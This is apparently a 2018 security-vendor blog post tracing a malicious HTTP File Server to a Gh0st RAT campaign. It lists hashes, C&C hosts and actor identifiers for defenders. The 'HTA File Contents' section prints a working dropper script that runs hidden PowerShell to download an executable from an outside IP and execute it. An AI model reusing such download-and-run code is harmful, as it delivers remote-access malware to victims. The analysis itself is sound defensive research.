Field Notes: Malicious HFS Instances Serving Gh0stRAT

Posted on 2018-07-09 by Adam Swanda

HTTP File Server, commonly abbreviated as HFS, is a free and simple means to send and receive files across the Internet. This also makes the software a popular choice among malicious actors for hosting and distributing malware and exploits, and an interesting target for malware researchers. An investigation into an HFS instance hosting an exploit for CVE-2018-8174 led to the discovery of an interesting threat actor and their infrastructure, the continued use of the Gh0st RAT malware, and many common attributes we can use to help us identify this malicious activity in the wild.

Field Notes

Field Notes is a new blog post series meant to quickly share threat data, Indicators of Compromise, commentary on current events, or other brief types of analysis with the community at a higher level without performing in-depth reverse engineering or deep dives into a given campaign, actor, infrastructure, or otherwise. Many researchers often post short briefs on campaigns or threats as Pastebin posts, GitHub Gist's, or Twitter threads but we feel this blog format is a great medium to get across not only the technical analysis and indicators but also some contextual information on the threat or event of focus. The complete series can be browsed by tag:field-notes.

Background

The HTTP File Server, also known as HFS, was created to provide the free and easy means to share files across the Internet, making the software a popular choice among a variety of actors for hosting and distributing malicious content. On the other side of the coin, this also means that the discovery of malicious HFS instances can be a treasure trove for malware researchers. The hosting services are often left wide open - allowing anyone who visits the ability to view and download any of the hosted files. It's not uncommon to see HFS being chatted about on Twitter among researchers using hashtags like "#opendir". Additionally, the use of HFS to host malicious content is quite popular among China-based threat actors.

InQuest was notified of one such HFS instance, located at http://9mng[.]vip and using an uncommonly high port number, through a helpful third-party. The homepage that sometimes allows for the open browsing of files was replaced with an index.html file embedded with VBScript meant to exploit the CVE-2018-8174 vulnerability when a vulnerable user visits the page. The exploit code was copied directly from the public proof of concept on exploit-db.com with the debug messages commented out and the shellcode slightly modified although it did not successfully trigger exploitation in lab conditions. Nonetheless, this made me interested in what else could be found on this HFS server. Special thanks to security researcher Sev for discovering this HFS instance and bringing to our attention the exploit and malicious HTA file detailed below.

Discovered next was an HTA file by the name of 770747.hta, the contents and file hashes of which can be seen below:

  • File: 770747.hta
  • MD5: cf7535110cdc8b0f854e15516f79b373
  • SHA1: c4eeda16f51162cd177ebe7cfdd2de96dc33d433
  • SHA256: cdcff5b367d079ca11a2bc23c31fc341dcad060fa27c30a8b4fa453dab699eb1

HTA File Contents

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://103.100.210[.]50:7777/SB360.exe\', \'c:/windows/temp/770747.exe\'); c:/windows/temp/770747.exe', 0);window.close();
</script>

By quickly examining the code we can see this file was meant to act as a small dropper to download the file SB360.exe from the URL onto disk with the file name 770747.exe.

The downloaded file is a UPX compressed Windows executable with the following attributes:

  • File: SB360.exe
  • MD5: 27b1e5595c46e3bff5c9d7392f18b24d
  • SHA1: 304bb03c334625e18f7cf941fa3e34fc18b2e31f
  • SHA256: 20bd5a03996f8ee8b4831b1eb86aea805fe424023da88f5896909fe81aa58fa7

Once decompressed, this same file will have the following hashes:

  • MD5: 403c08aa6a48310dc326dec9f3929116
  • SHA1: df46fca6d48f5c1d4a29da9821ad8235eac50e45
  • SHA256: 39789a629d28b8b5b6895450908db2078f1cd473bc3915637fda772b0a62da46

The downloaded payload was identified as Gh0st RAT, a full-featured remote access trojan for Windows. This malware family has been around for many years now and still sees wide use. Similar to the use of HFS for hosting malicious, Gh0st RAT is also popular with Chinese threat actors. There are also several variants of it floating around due to the source code being made available online.

This particular payload copies itself to the %WINDOWS% directory using the filename 770747.exe and sets itself up for persistence by creating a Windows service under the name Sentinel SuperPro Server that points to the copied file path.

Windows Service

Next, this malware attempts to communicate with a Command and Control server at the domain 770747.9mng[.]vip. Examination of the malware also finds the secondary server 77074722.f3322[.]net. The f3322[.]net domain is a dynamic DNS provider based in China which often comes up in the course of research into Chinese hosted malware, but the top level domain itself is not directly malicious. At the time of the investigation, the C&C server was unresponsive, and no additional action occurred.

VirusTotal results for this payload show that it has been seen in the wild using the file names DHL2018.exe and DHL2018.dat. Pivoting to search VirusTotal for files using the same name returns a result for a second DHL2018.dat file uploaded by a user from South Korea on 06-20-2018. The file exhibits identical behavior to our original payload and also attempts to contact the C&C server 770747.9mng[.]vip:

  • MD5: f94172de8692879711dc020588b3ff89
  • SHA1: e7c8d262ddc1f7d5296f00d41356ab6062b10433
  • SHA256: 0704fcd3be874336a502bea1cef1a2fa7a15902249b9d21876289ed7b7c51b29

The Curious Case of 770747

For the fourth time during the investigation the string "770747" has popped up:

  • File name used by HTA dropper
  • File name used by delivered malware executable
  • C&C domain name used by 2 malware executables

Revisiting the HFS server that led to this malware, 9mng[.]vip, a web server is also running on port 80 with "770747" listed at the bottom of the homepage as a QQ contact number. QQ is an instant messaging service provided by Tencent and also quite popular in China.

Searching for further references to this QQ number brings up yet another reference of interest. This time as the contact information for the "Admin" user of a Chinese language forum on baidu200[.]com.

The forum has several subforums, with some roughly translating to identify sections such as "Information Security", "Vulnerability Announcement", and "Penetration attack and defense". In one particular post by the Admin user in 2010, they advertise paid access to security-related content including topics such as malware and RAT use, website defacement, penetration testing, and more.

In this post, the Admin user provides the QQ number 770747 as their contact information, references a TenPay account by the same identifier and an Alipay account with the email address dzw770747@126[.]com.

Baidu200 Post

Additionally, in a separate Chinese language forum, a user posted a complaint about 770747 claiming to have been scammed by them. The poster provides the following information to other users so they can identify the suspected scammer:

Contact Details

The "770747" identifier has now been seen in multiple locations as it relates to the original HFS instance, the Gh0st RAT samples, and being tied to the Admin user of a security-focused forum. While the actor does not seem particularly advanced due to their poor OPSEC and use of modified but publicly available malware and exploits, we've been able to associate the malware to an actor and the actor to a set of Tactics, Techniques, and Procedures we can use for further research.

Finding Other HFS + Gh0st RAT Incidents

Using the quick investigation above as a sort of template, it's possible to use some of the key details and expand the scope of investigation in an attempt to identify other China-based HFS instances - particularly those delivering the Gh0st RAT malware.

TTPs:

  • Use of HFS on high, non-standard TCP port
  • Use of Gh0st RAT malware
  • Use of filenames SB360.exe and DHL2018.exe
  • Use of dynamic DNS hosting for Command and Control servers

The file name SB360.exe is used legitimately by the software 360Safe, an anti-virus suite developed by the company Qihoo based in China. Further digging shows that it is also the default file name to the server component of Gh0st RAT in a leaked copy of its source code available on GitHub.com. The UPX compression of payloads is also an option available to actors using this malware as we saw with the original payload. It may also be of note that the GitHub repository for this copy of Gh0st RAT uses the string "DHL_" in its name, but we were unable to find any substantial evidence of "DHL2018" being used in other notable locations.

An investigation into the leaked source code shows it's also available in many other locations including public forums and file sharing websites. Although Gh0st RAT's source code is publicly available, actors who use this leaked source code and do not modify the default parameters will be creating a payload with the filename "SB360.exe" as we found in the case of 770747.

Gh0st RAT Source Code

Searching VirusTotal Intellignece for other samples using the filename "SB360.exe" quickly leads to more results going back several years. Some digging through the results finds several cases where a payload using this file name is delivered from a China hosted web server using a high TCP port number and communicates back to the same server or a dynamic DNS host. Although not every instance was verified as HFS being used to serve the payload, often due to the server no longer being active, many of the servers were indeed HFS. The STORM DDoS bot malware is also still distributed in this same manner, and many times it was hosted on the same HFS. Examples of this hosting activity are listed below.

  • MD5:27b1e5595c46e3bff5c9d7392f18b24d
  • Delivery URL: http://103.100.210[.]50:7777/SB360.exe

  • MD5: ace601183f1fa24cba048039104e65de
  • Delivery URL: http://42.226.35[.]42:2323/SB360.exe

  • MD5: b35e8808e41445bb2d37aa329e74acce
  • Delivery URL: http://112.30.132[.]138:2323/SB360.exe

  • MD5: 3fdd0a416e6778f992a1be9f97e91c60
  • Delivery URL: http://112.30.132[.]138:2323/SB360.exe

  • MD5: 825fa52261713621ee646b1c669b69bf
  • Delivery URL: http://118.193.137[.]60:2500/SB360.exe

  • MD5: a4c9c8bbfd909422bec69ba82b60af42
  • Delivery URL: http://199.195.129[.]250:7878/SB360.exe

  • MD5: 16e2a37b3deaa6397535d0ebf9cc3c43
  • Delivery URL: http://220.165.9[.]89:5566/SB360.exe

As mentioned at the beginning of this post, malware researchers are often sharing open web directories with malicious content they find for the sake of research and awareness. The Twitter hashtag #opendir is often used when discussing these findings. A look over these posts yields many malicious websites and payloads with HFS instances commonly among them.

One example from June 2018 shows the user @ExecuteMalware referencing an open HFS instance hosting Gh0st RAT, among other files.

Twitter Post

The service Shodan.io can also be beneficial in identifying HFS servers during an investigation. Shodan is a very powerful search engine that lets the user look for Internet connected systems and use a variety of filters and queries to narrow results to specific services, ports, countries, and more. Not all systems found by Shodan are by any means necessarily malicious as Shodan returns all systems it has identified per a given query.

For example, using the query "Server: HFS" returns thousands of results for instances located in the United States, China, and other countries.

Shodan Search Results

By leveraging the data collected by Shodan, it's possible to view information of a given IP address without actually visiting or fingerprinting the host yourself, such as the software used, the operating system, geolocation, web server banners, and more.

Overview

In this investigation we went from a single reported exploit hosted on a web server to the discovery of associated malware and the likely threat actor behind it; then leveraged the artifacts and TTPs we found along the way and pivoted from a single event to identifying a larger trend. Public and free tools like Google, GitHub, Shodan, and VirusTotal can be immensely helpful in research efforts like this.

Once more context is gathered, and a bigger picture is painted, the collected information can often be used in the creation of proactive detection measures such as SIEM alerting. In this case, the default Gh0st RAT file name and common hosting patterns of HFS and C&C servers are great starting points. For example, a SIEM alert might check web proxy logs for users downloading the file SB360.exe from an external host using a non-standard or high TCP port.

InQuest detects the Gh0st RAT malware with the following signature:

Name Event ID
Gh0st_RAT_Trojan 5000199

Indicators of Compromise

Hashes:

  • cf7535110cdc8b0f854e15516f79b373
  • 27b1e5595c46e3bff5c9d7392f18b24d
  • 403c08aa6a48310dc326dec9f3929116
  • f94172de8692879711dc020588b3ff89
  • 27b1e5595c46e3bff5c9d7392f18b24d
  • ace601183f1fa24cba048039104e65de
  • b35e8808e41445bb2d37aa329e74acce
  • 3fdd0a416e6778f992a1be9f97e91c60
  • 825fa52261713621ee646b1c669b69bf
  • a4c9c8bbfd909422bec69ba82b60af42
  • 16e2a37b3deaa6397535d0ebf9cc3c43

Hosts:

  • http://baidu200[.]com
  • http://www.9mng[.]vip
  • http://770747.9mng[.]vip
  • http://77074722.f3322[.]net
  • http://103.100.210[.]50:7777
  • http://42.226.35[.]42:2323
  • http://112.30.132[.]138:2323
  • http://118.193.137[.]60:2500
  • http://199.195.129[.]250:7878
  • http://220.165.9[.]89:5566

Email / IM: - dzw770747@126[.]com - 770747 (QQ number)

field-notes malware-analysis